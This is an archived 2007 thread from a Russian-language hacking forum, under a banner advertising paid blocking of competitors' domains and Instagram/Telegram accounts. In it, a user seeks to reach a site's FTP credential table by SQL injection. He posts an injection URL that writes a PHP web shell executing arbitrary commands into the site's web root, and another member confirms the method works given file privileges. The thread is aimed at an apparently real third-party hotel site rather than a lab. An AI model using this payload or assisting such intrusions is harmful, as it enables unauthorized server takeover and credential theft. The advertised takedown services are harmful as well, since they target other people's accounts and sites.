УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Проблема с доступом к Sql БД

Опции темы

Поиск в этой теме

Опции просмотра

Проблема с доступом к Sql БД

10.12.2007, 01:53

~EviL~

Участник форума

Регистрация: 14.08.2007

Сообщений: 150

Провел на форуме:
686641

Репутация: 205

Проблема с доступом к Sql БД

Я нашел таблицу для фтп доступа к сайту и у меня нет прав на ее прочтение. Есть же таблица User_privileges, можно ли внести в нее изменения, чтобы я получил доступ к таблице с фтп доступом через Sql-injection? Заранее спасибо

10.12.2007, 02:01

Termin@L

Участник форума

Регистрация: 07.12.2006

Сообщений: 192

Провел на форуме:
492591

Репутация: 123

Ну можно берёшь аккаунт рута или другого пользователя, который имее доступ к этой таблице и вписываешь всё что душа захочет, только вряд ли можно это сделать с помощью Update, нужно сделать Grant
Вобщем чувак - без шансов

10.12.2007, 02:14

~EviL~

Участник форума

Регистрация: 14.08.2007

Сообщений: 150

Провел на форуме:
686641

Репутация: 205

Мдам, спасибо =)

10.12.2007, 03:15

~EviL~

Участник форума

Регистрация: 14.08.2007

Сообщений: 150

Провел на форуме:
686641

Репутация: 205

А вот, я правильно создаю шелл:

Код HTML:

http://www.site.com/script.php?id=-597+UNION+SELECT+'<?php system($_GET[cmd]); ?>'+FROM+chotelsi_tophotel.news_users+INTO+OUTFILE+'/users/hotels/public_html/shell.php'/*

10.12.2007, 08:29

.Slip

Leaders of Antichat - Level 4

Регистрация: 16.01.2006

Сообщений: 1,966

Провел на форуме:
21768337

Репутация: 3486

Цитата:

Пи*дец, думай хоть немного когда пишешь.

Цитата:

можно ли внести в нее изменения, чтобы я получил доступ к таблице с фтп доступом через Sql-injection?

Технически да, практически нет. Даже если для ремоут юзера разрешён update, то в субд mysql ничего не получится сделать, т.к. отсутствует поддержка подзапросов.

Цитата:

А вот, я правильно создаю шелл:
http://www.site.com/script.php?id=-597+UNION+SELECT+'<?php system($_GET[cmd]); ?>'+FROM+chotelsi_tophotel.news_users+INTO+OUTFILE +'/users/hotels/public_html/shell.php'/*

Ну если есть file_priv и файл создаётся, то правильно.

__________________
..

10.12.2007, 08:38

~EviL~

Участник форума

Регистрация: 14.08.2007

Сообщений: 150

Провел на форуме:
686641

Репутация: 205

Нет там file_priv и файл не создается. Значит - не судьба =)

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая	k00p3r	Чужие Статьи	1	12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход